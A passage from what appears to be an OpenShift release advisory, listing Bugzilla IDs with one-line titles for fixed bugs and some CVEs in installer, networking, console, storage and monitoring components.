GET on the route will unidle it 1926154 - Create new pool with arbiter - wrong replica 1926278 - [oVirt] consume K8S 1.20 packages 1926279 - Pod ignores mtu setting from sriovNetworkNodePolicies in case of PF partitioning 1926285 - ignore pod not found status messages 1926289 - Accessibility: Modal content hidden from screen readers 1926310 - CannotRetrieveUpdates alerts on Critical severity 1926329 - [Assisted-4.7][Staging] monitoring stack in staging is being overloaded by the amount of metrics being exposed by assisted-installer pods and scraped by prometheus. 1926336 - Service details can overflow boxes at some screen widths 1926346 - move to go 1.15 and registry.ci.openshift.org 1926364 - Installer timeouts because proxy blocked connection to Ironic API running on bootstrap VM 1926465 - bootstrap kube-apiserver does not have --advertise-address set – was: [BM][IPI][DualStack] Installation fails cause Kubernetes service doesn't have IPv6 endpoints 1926484 - API server exits non-zero on 2 SIGTERM signals 1926547 - OpenShift installer not reporting IAM permission issue when removing the Shared Subnet Tag 1926579 - Setting .spec.policy is deprecated and will be removed eventually. Please use .spec.profile instead is being logged every 3 seconds in scheduler operator log 1926598 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results 1926776 - "Template support" modal appears when select the RHEL6 common template 1926835 - [e2e][automation] prow gating use unsupported CDI version 1926843 - pipeline with finally tasks status is improper 1926867 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade 1926893 - When deploying the operator via OLM (after creating the respective catalogsource), the deployment "lost" the resources section. 1926903 - NTO may fail to disable stalld when relying on Tuned '[service]' plugin 1926931 - Inconsistent ovs-flow rule on one of the app node for egress node 1926943 - vsphere-problem-detector: Alerts in CI jobs 1926977 - [sig-devex][Feature:ImageEcosystem][Slow] openshift sample application repositories rails/nodejs 1927013 - Tables don't render properly at smaller screen widths 1927017 - CCO does not relinquish leadership when restarting for proxy CA change 1927042 - Empty static pod files on UPI deployments are confusing 1927047 - multiple external gateway pods will not work in ingress with IP fragmentation 1927068 - Workers fail to PXE boot when IPv6 provisionining network has subnet other than /64 1927075 - [e2e][automation] Fix pvc string in pvc.view 1927118 - OCP 4.7: NVIDIA GPU Operator DCGM metrics not displayed in OpenShift Console Monitoring Metrics page 1927244 - UPI installation with Kuryr timing out on bootstrap stage 1927263 - kubelet service takes around 43 secs to start container when started from stopped state 1927264 - FailedCreatePodSandBox due to multus inability to reach apiserver 1927310 - Performance: Console makes unnecessary requests for en-US messages on load 1927340 - Race condition in OperatorCondition reconcilation 1927366 - OVS configuration service unable to clone NetworkManager's connections in the overlay FS 1927391 - Fix flake in TestSyncPodsDeletesWhenSourcesAreReady 1927393 - 4.7 still points to 4.6 catalog images 1927397 - p&f: add auto update for priority & fairness bootstrap configuration objects 1927423 - Happy "Not Found" and no visible error messages on error-list page when /silences 504s 1927465 - Homepage dashboard content not internationalized 1927678 - Reboot interface defaults to softPowerOff so fencing is too slow 1927731 - /usr/lib/dracut/modules.d/30ignition/ignition --version sigsev 1927797 - 'Pod(s)' should be included in the pod donut label when a horizontal pod autoscaler is enabled 1927882 - Can't create cluster role binding from UI when a project is selected 1927895 - global RuntimeConfig is overwritten with merge result 1927898 - i18n Admin Notifier 1927902 - i18n Cluster Utilization dashboard duration 1927903 - "CannotRetrieveUpdates" - critical error in openshift web console 1927925 - Manually misspelled as Manualy 1927941 - StatusDescriptor detail item and Status component can cause runtime error when the status is an object or array 1927942 - etcd should use socket option (SO_REUSEADDR) instead of wait for port release on process restart 1927944 - cluster version operator cycles terminating state waiting for leader election 1927993 - Documentation Links in OKD Web Console are not Working 1928008 - Incorrect behavior when we click back button after viewing the node details in Internal-attached mode 1928045 - N+1 scaling Info message says "single zone" even if the nodes are spread across 2 or 0 zones 1928147 - Domain search set in the required domains in Option 119 of DHCP Server is ignored by RHCOS on RHV 1928157 - 4.7 CNO claims to be done upgrading before it even starts 1928164 - Traffic to outside the cluster redirected when OVN is used and NodePort service is configured 1928297 - HAProxy fails with 500 on some requests 1928473 - NetworkManager overlay FS not being created on None platform 1928512 - sap license management logs gatherer 1928537 - Cannot IPI with tang/tpm disk encryption 1928640 - Definite error message when using StorageClass based on azure-file / Premium_LRS 1928658 - Update plugins and Jenkins version to prepare openshift-sync-plugin 1.0.46 release 1928850 - Unable to pull images due to limited quota on Docker Hub 1928851 - manually creating NetNamespaces will break things and this is not obvious 1928867 - golden images - DV should not be created with WaitForFirstConsumer 1928869 - Remove css required to fix search bug in console caused by pf issue in 2021.1 1928875 - Update translations 1928893 - Memory Pressure Drop Down Info is stating "Disk" capacity is low instead of memory 1928931 - DNSRecord CRD is using deprecated v1beta1 API 1928937 - CVE-2021-23337 nodejs-lodash: command injection via template 1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions 1929052 - Add new Jenkins agent maven dir for 3.6 1929056 - kube-apiserver-availability.rules are failing evaluation 1929110 - LoadBalancer service check test fails during vsphere upgrade 1929136 - openshift isn't able to mount nfs manila shares to pods 1929175 - LocalVolumeSet: PV is created on disk belonging to other provisioner 1929243 - Namespace column missing in Nodes Node Details / pods tab 1929277 - Monitoring workloads using too high a priorityclass 1929281 - Update Tech Preview badge to transparent border color when upgrading to PatternFly v4.87.1 1929314 - ovn-kubernetes endpoint slice controller doesn't run on CI jobs 1929359 - etcd-quorum-guard uses origin-cli [4.8] 1929577 - Edit Application action overwrites Deployment envFrom values on save 1929654 - Registry for Azure uses legacy V1 StorageAccount 1929693 - Pod stuck at "ContainerCreating" status 1929733 - oVirt CSI driver operator is constantly restarting 1929769 - Getting 404 after switching user perspective in another tab and reload Project details 1929803 - Pipelines shown in edit flow for Workloads created via ContainerImage flow 1929824 - fix alerting on volume name check for vsphere 1929917 - Bare-metal operator is firing for ClusterOperatorDown for 15m during 4.6 to 4.7 upgrade 1929944 - The etcdInsufficientMembers alert fires incorrectly when any instance is down and not when quorum is lost 1930007 - filter dropdown item filter and resource list dropdown item filter doesn't support multi selection 1930015 - OS list is overlapped by buttons in template wizard 1930064 - Web console crashes during VM creation from template when no storage classes are defined 1930220 - Cinder CSI driver is not able to mount volumes under heavier load 1930240 - Generated clouds.yaml incomplete when provisioning network is disabled 1930248 - After creating a remediation flow and rebooting a worker there is no access to the openshift-web-console 1930268 - intel vfio devices are not expose as resources 1930356 - Darwin binary missing from mirror.openshift.com 1930393 - Gather info about unhealthy SAP pods 1930546 - Monitoring-dashboard-workload keep loading when user with cluster-role cluster-monitoring-view login develoer console 1930570 - Jenkins templates are displayed in Developer Catalog twice 1930620 - the logLevel field in containerruntimeconfig can't be set to "trace" 1930631 - Image local-storage-mustgather in the doc does not come from product registry 1930893 - Backport upstream patch 98956 for pod terminations 1931005 - Related objects page doesn't show the object when its name is empty 1931103 - remove periodic log within kubelet 1931115 - Azure cluster install fails with worker type workers Standard_D4_v2 1931215 - [RFE] Cluster-api-provider-ovirt should handle affinity groups 1931217 - [RFE] Installer should create RHV Affinity group for OCP cluster VMS 1931467 - Kubelet consuming a large amount of CPU and memory and node becoming unhealthy 1931505 - [IPI baremetal] Two nodes hold the VIP post remove and start of the Keepalived container 1931522 - Fresh UPI install on BM with bonding using OVN Kubernetes fails 1931529 - SNO: mentioning of 4 nodes in error message - Cluster network CIDR prefix 24 does not contain enough addresses for 4 hosts each one with 25 prefix (128 addresses) 1931629 - Conversational Hub Fails due to ImagePullBackOff 1931637 - Kubeturbo Operator fails due to ImagePullBackOff 1931652 - [single-node] etcd: discover-etcd-initial-cluster graceful termination race. 1931658 - [single-node] cluster-etcd-operator: cluster never pivots from bootstrapIP endpoint 1931674 - [Kuryr] Enforce nodes MTU for the Namespaces and Pods 1931852 - Ignition HTTP GET is failing, because DHCP IPv4 config is failing silently 1931883 - Fail to install Volume Expander Operator due to CrashLookBackOff 1931949 - Red Hat Integration Camel-K Operator keeps stuck in Pending state 1931974 - Operators cannot access kubeapi endpoint on OVNKubernetes on ipv6 1931997 - network-check-target causes upgrade to fail from 4.6.18 to 4.7 1932001 - Only one of multiple subscriptions to the same package is honored 1932097 - Apiserver liveness probe is marking it as unhealthy during normal shutdown 1932105 - machine-config ClusterOperator claims level while control-plane still updating 1932133 - AWS EBS CSI Driver doesn’t support “csi.storage.k8s.io/fsTyps” parameter 1932135 - When “iopsPerGB” parameter is not set, event for AWS EBS CSI Driver provisioning is not clear 1932152 - When “iopsPerGB” parameter is set to a wrong number, events for AWS EBS CSI Driver provisioning are not clear 1932154 - [AWS ] machine stuck in provisioned phase , no warnings or errors 1932182 - catalog operator causing CPU spikes and bad etcd performance 1932229 - Can’t find kubelet metrics for aws ebs csi volumes 1932281 - [Assisted-4.7][UI] Unable to change upgrade channel once upgrades were discovered 1932323 - CVE-2021-26540 sanitize-html: improper validation of hostnames set by the "allowedIframeHostnames" option can lead to bypass hostname whitelist for iframe element 1932324 - CRIO fails to create a Pod in sandbox stage - starting container process caused: process_linux.go:472: container init caused: Running hook #0:: error running hook: exit status 255, stdout: , stderr: \"\n" 1932362 - CVE-2021-26539 sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation 1932401 - Cluster Ingress Operator degrades if external LB redirects http to https because of new "canary" route 1932453 - Update Japanese timestamp format 1932472 - Edit Form/YAML switchers cause weird collapsing/code-folding issue 1932487 - [OKD] origin-branding manifest is missing cluster profile annotations 1932502 - Setting MTU for a bond interface using Kernel arguments is not working 1932618 - Alerts during a test run should fail the test job, but were not 1932624 - ClusterMonitoringOperatorReconciliationErrors is pending at the end of an upgrade and probably should not be 1932626 - During a 4.8 GCP upgrade OLM fires an alert indicating the operator is unhealthy 1932673 - Virtual machine template provided by red hat should not be editable. The UI allows to edit and then reverse the change after it was made 1932789 - Proxy with port is unable to be validated if it overlaps with service/cluster network 1932799 - During a hive driven baremetal installation the process does not go beyond 80% in the bootstrap VM 1932805 - e2e: test OAuth API connections in the tests by that name 1932816 - No new local storage operator bundle image is built 1932834 - enforce the use of hashed access/authorize tokens 1933101 - Can not upgrade a Helm Chart that uses a library chart in the OpenShift dev console 1933102 - Canary daemonset uses default node selector 1933114 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it [Suite:openshift/conformance/parallel/minimal] 1933159 - multus DaemonSets should use maxUnavailable: 33% 1933173 - openshift-sdn/sdn DaemonSet should use maxUnavailable: 10% 1933174 - openshift-sdn/ovs DaemonSet should use maxUnavailable: 10% 1933179 - network-check-target DaemonSet should use maxUnavailable: 10% 1933180 - openshift-image-registry/node-ca DaemonSet should use maxUnavailable: 10% 1933184 - openshift-cluster-csi-drivers DaemonSets should use maxUnavailable: 10% 1933263 - user manifest with nodeport services causes bootstrap to block 1933269 - Cluster unstable replacing an unhealthy etcd member 1933284 - Samples in CRD creation are ordered arbitarly 1933414 - Machines are created with unexpected name for Ports 1933599 - bump k8s.io/apiserver to 1.20.3 1933630 - [Local Volume] Provision disk failed when disk label has unsupported value like ":" 1933664 - Getting Forbidden for image in a container template when creating a sample app 1933708 - Grafana is not displaying deployment config resources in dashboard Default /Kubernetes / Compute Resources / Namespace (Workloads) 1933711 - EgressDNS: Keep short lived records at most 30s 1933730 - [AI-UI-Wizard] Toggling "Use extra disks for local storage" checkbox highlights the "Next" button to move forward but grays out once clicked 1933761 - Cluster DNS service caps TTLs too low and thus evicts from its cache too aggressively 1933772 - MCD Crash Loop Backoff 1933805 - TargetDown alert fires during upgrades because of normal upgrade behavior 1933857 - Details page can throw an uncaught exception if kindObj prop is undefined 1933880 - Kuryr-Controller crashes when it's missing the status object 1934021 - High RAM usage on machine api termination node system oom 1934071 - etcd consuming high amount of memory and CPU after upgrade to 4.6.17 1934080 - Both old and new Clusterlogging CSVs stuck in Pending during upgrade 1934085 - Scheduling conformance tests failing in a single node cluster 1934107 - cluster-authentication-operator builds URL incorrectly for IPv6 1934112 - Add memory and uptime metadata to IO archive 1934113 - mcd panic when there's not enough free disk space 1934123 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP 1934163 - Thanos Querier restarting and gettin alert ThanosQueryHttpRequestQueryRangeErrorRateHigh 1934174 - rootfs too small when enabling NBDE 1934176 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3 1934177 - knative-camel-operator CreateContainerError "container_linux.go:366: starting container process caused: chdir to cwd (\"/home/nonroot\") set in config.json failed: permission denied" 1934216 - machineset-controller stuck in CrashLoopBackOff after upgrade to 4.7.0 1934229 - List page text filter has input lag 1934397 - Extend OLM operator gatherer to include Operator/ClusterServiceVersion conditions 1934400 - [ocp_4][4.6][apiserver-auth] OAuth API servers are not ready - PreconditionNotReady 1934516 - Setup different priority classes for prometheus-k8s and prometheus-user-workload pods 1934556 - OCP-Metal images 1934557 - RHCOS boot image bump for LUKS fixes 1934643 - Need BFD failover capability on ECMP routes 1934711 - openshift-ovn-kubernetes ovnkube-node DaemonSet should use maxUnavailable: 10% 1934773 - Canary client should perform canary probes explicitly over HTTPS (rather than redirect from HTTP) 1934905 - CoreDNS's "errors" plugin is not enabled for custom upstream resolvers 1935058 - Can’t finish install sts clusters on aws government region 1935102 - Error: specifying a root certificates file with the insecure flag is not allowed during oc login 1935155 - IGMP/MLD packets being dropped 1935157 - [e2e][automation] environment tests broken 1935165 - OCP 4.6 Build fails when filename contains an umlaut 1935176 - Missing an indication whether the deployed setup is SNO. 1935269 - Topology operator group shows child Jobs. Not shown in details view's resources. 1935419 - Failed to scale worker using virtualmedia on Dell R640 1935528 - [AWS][Proxy] ingress reports degrade with CanaryChecksSucceeding=False in the cluster with proxy setting 1935539 - Openshift-apiserver CO unavailable during cluster upgrade from 4.6 to 4.7 1935541 - console operator panics in DefaultDeployment with nil cm 1935582 - prometheus liveness probes cause issues while replaying WAL 1935604 - high CPU usage fails ingress controller 1935667 - pipelinerun status icon rendering issue 1935706 - test: Detect when the master pool is still updating after upgrade 1935732 - Update Jenkins agent maven directory to be version agnostic [ART ocp build data] 1935814 - Pod and Node lists eventually have incorrect row heights when additional columns have long text 1935909 - New CSV using ServiceAccount named "default" stuck in Pending during upgrade 1936022 - DNS operator performs spurious updates in response to API's defaulting of daemonset's terminationGracePeriod and service's clusterIPs 1936030 - Ingress operator performs spurious updates in response to API's defaulting of NodePort service's clusterIPs field 1936223 - The IPI installer has a typo. It is missing the word "the" in "the Engine". 1936336 - Updating multus-cni builder & base images to be consistent with ART 4.8 (closed) 1936342 - kuryr-controller restarting after 3 days cluster running - pools without members 1936443 - Hive based OCP IPI baremetal installation fails to connect to API VIP port 22623 1936488 - [sig-instrumentation][Late] Alerts shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured: Prometheus query error 1936515 - sdn-controller is missing some health checks 1936534 - When creating a worker with a used mac-address stuck on registering 1936585 - configure alerts if the catalogsources are missing 1936620 - OLM checkbox descriptor renders switch instead of checkbox 1936721 - network-metrics-deamon not associated with a priorityClassName 1936771 - [aws ebs csi driver] The event for Pod consuming a readonly PVC is not clear 1936785 - Configmap gatherer doesn't include namespace name (in the archive path) in case of a configmap with binary data 1936788 - RBD RWX PVC creation with Filesystem volume mode selection is creating RWX PVC with Block volume mode instead of disabling Filesystem volume mode selection 1936798 - Authentication log gatherer shouldn't scan all the pod logs in the openshift-authentication namespace 1936801 - Support ServiceBinding 0.5.0+ 1936854 - Incorrect imagestream is shown as selected in knative service container image edit flow 1936857 - e2e-ovirt-ipi-install-install is permafailing on 4.5 nightlies 1936859 - ovirt 4.4 -> 4.5 upgrade jobs are permafailing 1936867 - Periodic vsphere IPI install is broken - missing pip 1936871 - [Cinder CSI] Topology aware provisioning doesn't work when Nova and Cinder AZs are different 1936904 - Wrong output YAML when syncing groups without --confirm 1936983 - Topology view - vm details screen isntt stop loading 1937005 - when kuryr quotas are unlimited, we should not sent alerts 1937018 - FilterToolbar component does not handle 'null' value for 'rowFilters' prop 1937020 - Release new from image stream chooses incorrect ID based on status 1937077 - Blank White page on Topology 1937102 - Pod Containers Page Not Translated 1937122 - CAPBM changes to support flexible reboot modes 1937145 - [Local storage] PV provisioned by localvolumeset stays in "Released" status after the pod/pvc deleted 1937167 - [sig-arch] Managed cluster should have no crashlooping pods in core namespaces over four minutes 1937244 - [Local Storage] The model name of aws EBS doesn't be extracted well 1937299 - pod.spec.volumes.awsElasticBlockStore.partition is not respected on NVMe volumes 1937452 - cluster-network-operator CI linting fails in master branch 1937459 - Wrong Subnet retrieved for Service without Selector 1937460 - [CI] Network quota pre-flight checks are failing the installation 1937464 - openstack cloud credentials are not getting configured with correct user_domain_name across the cluster 1937466 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation 1937496 - Metrics viewer in OCP Console is missing date in a timestamp for selected datapoint 1937535 - Not all image pulls within OpenShift builds retry 1937594 - multiple pods in ContainerCreating state after migration from OpenshiftSDN to OVNKubernetes 1937627 - Bump DEFAULT_DOC_URL for 4.8 1937628 - Bump upgrade channels for 4.8 1937658 - Description for storage class encryption during storagecluster creation needs to be updated 1937666 - Mouseover on headline 1937683 - Wrong icon classification of output in buildConfig when the destination is a DockerImage 1937693 - ironic image "/" cluttered with files 1937694 - [oVirt] split ovirt providerIDReconciler logic into NodeController and ProviderIDController 1937717 - If browser default font size is 20, the layout of template screen breaks 1937722 - OCP 4.8 vuln due to BZ 1936445 1937929 - Operand page shows a 404:Not Found error for OpenShift GitOps Operator 1937941 - [RFE]fix wording for favorite templates 1937972 - Router HAProxy config file template is slow to render due to repetitive regex compilations 1938131 - [AWS] Missing iam:ListAttachedRolePolicies permission in permissions.go 1938321 - Cannot view PackageManifest objects in YAML on 'Home > Search' page nor 'CatalogSource details > Operators tab' 1938465 - thanos-querier should set a CPU request on the thanos-query container 1938466 - packageserver deployment sets neither CPU or memory request on the packageserver container 1938467 - The default cluster-autoscaler should get default cpu and memory requests if user omits them 1938468 - kube-scheduler-operator has a container without a CPU request 1938492 - Marketplace extract container does not request CPU or memory 1938493 - machine-api-operator declares restrictive cpu and memory limits where it should not 1938636 - Can't set the loglevel of the container: cluster-policy-controller and kube-controller-manager-recovery-controller 1938903 - Time range on dashboard page will be empty after drog and drop mouse in the graph 1938920 - ovnkube-master/ovs-node DaemonSets should use maxUnavailable: 10% 1938947 - Update blocked from 4.6 to 4.7 when using spot/preemptible instances 1938949 - [VPA] Updater failed to trigger evictions due to "vpa-admission-controller" not found 1939054 - machine healthcheck kills aws spot instance before generated 1939060 - CNO: nodes and masters are upgrading simultaneously 1939069 - Add source to vm template silently failed when no storage class is defined in the cluster 1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string 1939168 - Builds failing for OCP 3.11 since PR#25 was merged 1939226 - kube-apiserver readiness probe appears to be hitting /healthz, not /readyz 1939227 - kube-apiserver liveness probe appears to be hitting /healthz, not /livez 1939232 - CI tests using openshift/hello-world broken by Ruby Version Update 1939270 - fix co upgradeableFalse status and reason 1939294 - OLM may not delete pods with grace period zero (force delete) 1939412 - missed labels for thanos-ruler pods 1939485 - CVE-2021-20291 containers/storage: DoS via malicious image 1939547 - Include container="POD" in resource queries 1939555 - VSphereProblemDetectorControllerDegraded: context canceled during upgrade to 4.8.0 1939573 - after entering valid git repo url on add flow page, throwing warning message instead Validated 1939580 - Authentication operator is degraded during 4.8 to 4.8 upgrade and normal 4.8 e2e runs 1939606 - Attempting to put a host into maintenance mode warns about Ceph cluster health, but no storage cluster problems are apparent 1939661 - support new AWS region ap-northeast-3 1939726 - clusteroperator/network should not change condition/Degraded during normal serial test execution 1939731 - Image registry operator reports unavailable during normal serial run 1939734 - Node Fanout Causes Excessive WATCH Secret Calls, Taking Down Clusters 1939740 - dual stack nodes with OVN single ipv6 fails on bootstrap phase 1939752 - ovnkube-master sbdb container does not set requests on cpu or memory 1939753 - Delete HCO is stucking if there is still VM in the cluster 1939815 - Change the Warning Alert for Encrypted PVs in Create StorageClass(provisioner:RBD) page 1939853 - [DOC] Creating manifests API should not allow folder in the "file_name" 1939865 - GCP PD CSI driver does not have CSIDriver instance 1939869 - [e2e][automation] Add annotations to datavolume for HPP 1939873 - Unlimited number of characters accepted for base domain name 1939943 - cluster-kube-apiserver-operator check-endpoints observed a panic: runtime error: invalid memory address or nil pointer dereference 1940030 - cluster-resource-override: fix spelling mistake for run-level match expression in webhook configuration 1940057 - Openshift builds should use a wach instead of polling when checking for pod status 1940142 - 4.6->4.7 updates stick on OpenStackCinderCSIDriverOperatorCR_OpenStackCinderDriverControllerServiceController_Deploying 1940159 - [OSP] cluster destruction fails to remove router in BYON (with provider network) with Kuryr as primary network 1940206 - Selector and VolumeTableRows not i18ned 1940207 - 4.7->4.6 rollbacks stuck on prometheusrules admission webhook "no route to host" 1940314 - Failed to get type for Dashboard Kubernetes / Compute Resources / Namespace (Workloads) 1940318 - No data under 'Current Bandwidth' for Dashboard 'Kubernetes / Networking / Pod' 1940322 - Split of dashbard is wrong, many Network parts 1940337 - rhos-ipi installer fails with not clear message when openstack tenant doesn't have flavors needed for compute machines 1940361 - [e2e][automation] Fix vm action tests with storageclass HPP 1940432 - Gather datahubs.installers.datahub.sap.com resources from SAP clusters 1940488 - After fix for CVE-2021-3344, Builds do not mount node entitlement keys 1940498 - pods may fail to add logical port due to lr-nat-del/lr-nat-add error messages 1940499 - hybrid-overlay not logging properly before exiting due to an error 1940518 - Components in bare metal components lack resource requests 1940613 - CVE-2021-27292 nodejs-ua-parser-js: ReDoS via malicious User-Agent header 1940704 - prjquota is dropped from rootflags if rootfs is reprovisioned 1940755 - [Web-console][Local Storage] LocalVolumeSet could not be created from web-console without detail error info 1940865 - Add BareMetalPlatformType into e2e upgrade service unsupported list 1940876 - Components in ovirt components lack resource requests 1940889 - Installation failures in OpenStack release jobs 1940933 - [sig-arch] Check if alerts are firing during or after upgrade success: AggregatedAPIDown on v1beta1.metrics.k8s.io 1940939 - Wrong Openshift node IP as kubelet setting VIP as node IP 1940940 - csi-snapshot-controller goes unavailable when machines are added removed to cluster 1940950 - vsphere: client/bootstrap CSR double create 1940972 - vsphere: [4.6] CSR approval delayed for unknown reason 1941000 - cinder storageclass creates persistent volumes with wrong label failure-domain.beta.kubernetes.io/zone in multi availability zones architecture on OSP 16. 1941334 - [RFE] Cluster-api-provider-ovirt should handle auto pinning policy 1941342 - Add kata-osbuilder-generate.service as part of the default presets 1941456 - Multiple pods stuck in ContainerCreating status with the message "failed to create container for [kubepods burstable podxxx] : dbus: connection closed by user" being seen in the journal log 1941526 - controller-manager-operator: Observed a panic: nil pointer dereference 1941592 - HAProxyDown not Firing 1941606 - [assisted operator] Assisted Installer Operator CSV related images should be digests for icsp 1941625 - Developer -> Topology - i18n misses 1941635 - Developer -> Monitoring - i18n misses 1941636 - BM worker nodes deployment with virtual media failed while trying to clean raid 1941645 - Developer -> Builds - i18n misses 1941655 - Developer -> Pipelines - i18n misses 1941667 - Developer -> Project - i18n misses 1941669 - Developer -> ConfigMaps - i18n misses 1941759 - Errored pre-flight checks should not prevent install 1941798 - Some details pages don't have internationalized ResourceKind labels 1941801 - Many filter toolbar dropdowns haven't been internationalized 1941815 - From the web console the terminal can no longer connect after using leaving and returning to the terminal view 1941859 - [assisted operator] assisted pod deploy first time in error state 1941901 - Toleration merge logic does not account for multiple entries with the same key 1941915 - No validation against template name in boot source customization 1941936 - when setting parameters in containerRuntimeConfig, it will show incorrect information on its description 1941980 - cluster-kube-descheduler operator is broken when upgraded from 4.7 to 4.8 1941990 - Pipeline metrics endpoint changed in osp-1.4 1941995 - fix backwards incompatible trigger api changes in osp1.4 1942086 - Administrator -> Home - i18n misses 1942117 - Administrator -> Workloads - i18n misses 1942125 - Administrator -> Serverless - i18n misses 1942193 - Operand creation form - broken/cutoff blue line on the Accordion component (fieldGroup) 1942207 - [vsphere] hostname are changed when upgrading from 4.6 to 4.7.x causing upgrades to fail 1942271 - Insights operator doesn't gather pod information from openshift-cluster-version 1942375 - CRI-O failing with error "reserving ctr name" 1942395 - The status is always "Updating" on dc detail page after deployment has failed. 1942521 - [Assisted-4.7] [Staging][OCS] Minimum memory for selected role is failing although minimum OCP requirement satisfied 1942522 - Resolution fails to sort channel if inner entry does not satisfy predicate 1942536 - Corrupted image preventing containers from starting 1942548 - Administrator -> Networking - i18n misses 1942553 - CVE-2021-22133 go.elastic.co/apm: leaks sensitive HTTP headers during panic 1942555 - Network policies in ovn-kubernetes don't support external traffic from router when the endpoint publishing strategy is HostNetwork 1942557 - Query is reporting "no datapoint" when label cluster="" is set but work when the label is removed or when running directly in Prometheus 1942608 - crictl cannot list the images with an error: error locating item named "manifest" for image with ID 1942614 - Administrator -> Storage - i18n misses 1942641 - Administrator -> Builds - i18n misses 1942673 - Administrator -> Pipelines - i18n misses 1942694 - Resource names with a colon do not display property in the browser window title 1942715 - Administrator -> User Management - i18n misses 1942716 - Quay Container Security operator has Medium <-> Low colors reversed 1942725 - [SCC] openshift-apiserver degraded when creating new pod after installing Stackrox which creates a less privileged SCC [4.8] 1942736 - Administrator -> Administration - i18n misses 1942749 - Install Operator form should use info icon for popovers 1942837 - [OCPv4.6] unable to deploy pod with unsafe sysctls 1942839 - Windows VMs fail to start on air-gapped environments 1942856 - Unable to assign nodes for EgressIP even if the egress-assignable label is set 1942858 - [RFE]Confusing detach volume UX 1942883 - AWS EBS CSI driver does not support partitions 1942894 - IPA error when provisioning masters due to an error from ironic.conductor - /dev/sda is busy 1942935 - must-gather improvements 1943145 - vsphere: client/bootstrap CSR double create 1943175 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies (set azure storage account TLS version default to 1.2) 1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() 1943219 - unable to install IPI PRIVATE OpenShift cluster in Azure - SSH access from the Internet should be blocked 1943224 - cannot upgrade openshift-kube-descheduler from 4.7.2 to latest 1943238 - The conditions table does not occupy 100% of the width. 1943258 - [Assisted-4.7][Staging][Advanced Networking] Cluster install fails while waiting for control plane 1943314 - [OVN SCALE] Combine Logical Flows inside Southbound DB. 1943315 - avoid workload disruption for ICSP changes 1943320 - Baremetal node loses connectivity with bonded interface and OVNKubernetes 1943329 - TLSSecurityProfile missing from KubeletConfig CRD Manifest 1943356 - Dynamic plugins surfaced in the UI should be referred to as "Console plugins" 1943539 - crio-wipe is failing to start "Failed to shutdown storage before wiping: A layer is mounted: layer is in use by a container" 1943543 - DeploymentConfig Rollback doesn't reset params correctly 1943558 - [assisted operator] Assisted Service pod unable to reach self signed local registry in disco environement 1943578 - CoreDNS caches NXDOMAIN responses for up to 900 seconds 1943614 - add bracket logging on openshift/builder calls into buildah to assist test-platform team triage 1943637 - upgrade from ocp 4.5 to 4.6 does not clear SNAT rules on ovn 1943649 - don't use hello-openshift for network-check-target 1943667 - KubeDaemonSetRolloutStuck fires during upgrades too often because it does not accurately detect progress 1943719 - storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions 1943804 - API server on AWS takes disruption between 70s and 110s after pod begins termination via external LB 1943845 - Router pods should have startup probes configured 1944121 - OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors 1944160 - CNO: nbctl daemon should log reconnection info 1944180 - OVN-Kube Master does not release election lock on shutdown 1944246 - Ironic fails to inspect and move node to "manageable' but get bmh remains in "inspecting" 1944268 - openshift-install AWS SDK is missing endpoints for the ap-northeast-3 region 1944509 - Translatable texts without context in ssh expose component 1944581 - oc project not works with cluster proxy 1944587 - VPA could not take actions based on the recommendation when min-replicas=1 1944590 - The field name "VolumeSnapshotContent" is wrong on VolumeSnapshotContent detail page 1944602 - Consistant fallures of features/project-creation.feature Cypress test in CI 1944631 - openshif authenticator should not accept non-hashed tokens 1944655 - [manila-csi-driver-operator] openstack-manila-csi-nodeplugin pods stucked with ".. still connecting to unix:///var/lib/kubelet/plugins/csi-nfsplugin/csi.sock" 1944660 - dm-multipath race condition on bare metal causing /boot partition mount failures 1944674 - Project field become to "All projects" and disabled in "Review and create virtual machine" step in devconsole 1944678 - Whereabouts IPAM CNI duplicate IP addresses assigned to pods 1944761 - field level help instances do not use common util component 1944762 - Drain on worker node during an upgrade fails due to PDB set for image registry pod when only a single replica is present 1944763 - field level help instances do not use common util component 1944853 - Update to nodejs >=14.15.4 for ARM 1944974 - Duplicate KubeControllerManagerDown/KubeSchedulerDown alerts 1944986 - Clarify the ContainerRuntimeConfiguration cr description on the validation 1945027 - Button 'Copy SSH Command' does not work 1945085 - Bring back API data in etcd test 1945091 - In k8s 1.21 bump Feature:IPv6DualStack tests are disabled 1945103 - 'User credentials' shows even the VM is not running 1945104 - In k8s 1.21 bump '[sig-storage] [cis-hostpath] [Testpattern: Generic Ephemeral-volume' tests are disabled 1945146 - Remove pipeline Tech preview badge for pipelines GA operator 1945236 - Bootstrap ignition shim doesn't follow proxy settings 1945261 - Operator dependency not consistently chosen from default channel 1945312 - project deletion does not reset UI project context 1945326 - console-operator: does not check route health periodically 1945387 - Image Registry deployment should have 2 replicas and hard anti-affinity rules 1945398 - 4.8 CI failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial] 1945431 - alerts: SystemMemoryExceedsReservation triggers too quickly 1945443 - operator-lifecycle-manager-packageserver flaps Available=False with no reason or message 1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service 1945548 - catalog resource update failed if spec.secrets set to "" 1945584 - Elasticsearch operator fails to install on 4.8 cluster on ppc64le/s390x 1945599 - Optionally set KERNEL_VERSION and RT_KERNEL_VERSION 1945630 - Pod log filename no longer in -.log format 1945637 - QE- Automation- Fixing smoke test suite for pipeline-plugin 1945646 - gcp-routes.sh running as initrc_t unnecessarily 1945659 - [oVirt] remove ovirt_cafile from ovirt-credentials secret 1945677 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry 1945687 - Dockerfile needs updating to new container CI 